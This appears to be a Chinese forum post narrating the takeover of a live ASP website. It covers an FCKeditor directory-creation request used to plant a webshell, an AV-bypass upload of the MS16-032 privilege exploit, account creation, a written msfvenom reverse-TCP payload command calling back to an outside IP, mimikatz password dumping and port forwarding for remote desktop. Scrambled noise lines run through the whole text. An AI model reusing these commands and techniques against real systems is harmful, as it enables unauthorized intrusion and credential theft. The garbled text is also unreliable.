|
6 l/ J- N4 G; x
, [& o6 C7 W$ \- P( A0 x! w# n
9 M6 B! \5 q+ h: e+ K1 W# H- e3 H5 S
. |- x3 W/ K6 W& l* G( O | % o+ X2 p/ T. U$ z' [
! J7 c# H& r$ Z
) Y: D1 ]8 V" R$ `7 a一、 利用getwebshell篇
6 j0 P: Z' ^0 k( n6 Q
! i" s2 d0 r- Z7 d5 ~" t# ^! v
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
3 R0 u! p+ U; e7 p) c
7 ^6 C6 q: g: `6 K8 \
. i3 o& M4 K% d# v! x3 F
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
; Y" B( b' G9 w1 u b
$ L) {' {9 d$ Z% ~0 [" u, i下面我们构造一个asp目录,如: 0 w4 }+ j. H6 n& O! }
B# h& L. O# C% Q/ f5 a# c
. O) V( S1 G8 B8 u http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
/ J% I; O' e$ L; Q" b $ A' ^7 u/ ~8 m1 m# h
6 }! E+ o9 e/ R3 U4 I( ?- e 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
/ t6 Z9 T" G( f) Q; G0 i2 o
+ }, X. C6 y; s+ }0 J
一、 绕过安全狗云锁提权并且加账号
, ?% e1 T3 a) N+ x0 t
+ J+ X( g' I s. W9 {8 R7 j/ @
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
; z9 \( V6 s1 b# }
8 L' r4 {+ I6 \2 ^) w4 V$ |
如图:
$ T1 ]9 Q1 V( U6 l2 c
2 E, C% M7 U U& p. V0 r9 D+ u
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
5 ^% o2 O K. n- T% B! J
. [# b: G) g$ a& M一、 利用metasploit
& k: k! g' T `
3 t! w1 ]' b |- D& o9 G首先用pentestbox生成一个64位的payload如下命令
2 O& j: F* `' g" [8 E
% K+ q+ d' X, P& J Y" ?% i& S% n4 cmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
% q/ F8 k C z7 Y4 t3 r- M
4 i- ~2 p0 y! \/ l$ m- e为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 L J8 w' ?& o1 J" r3 w+ @; m5 e
; f2 r& K! f Q) y/ N0 ~8 i/ K
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
4 {, S+ S# q/ ^$ _
9 P2 U. g; z& G0 F7 d g1 w( u下面我们来做一个监听如下命令:
' {1 l' v# Y# `: Q9 |3 A: B0 t7 i
' k4 V- o3 k/ @8 F6 L' u
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
* t' n0 O; y7 d0 a . ~7 |+ i6 Q, Y$ Z. `! N( v
, s; x4 { D. G3 o+ H
| , e F" k' P3 Z+ T3 {+ x: A
. D- @! e# A: s ]4 E- i/ b$ |' p
0 n3 I7 r* H1 D7 ]. n8 @7 K& s9 p % \- r j% s* `) q
2 F8 T7 z/ _& F* g) Q
' k* k0 T% l6 k/ K0 u; a% n+ w9 t
9 O* ^$ k& t0 M! m2 ]( N' d
0 \6 l, o& _9 {" C
4 o# I4 I8 X- z5 q* e
: {1 c9 p: @: ^7 E
4 L+ T9 ~1 L5 n$ j7 ^0 ] ; \. _5 R5 f" H2 X, {' K+ L
0 D; |# \- M+ C4 A8 Q0 F! S& H
( o/ |& w, J; m- Q6 h, L: B | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06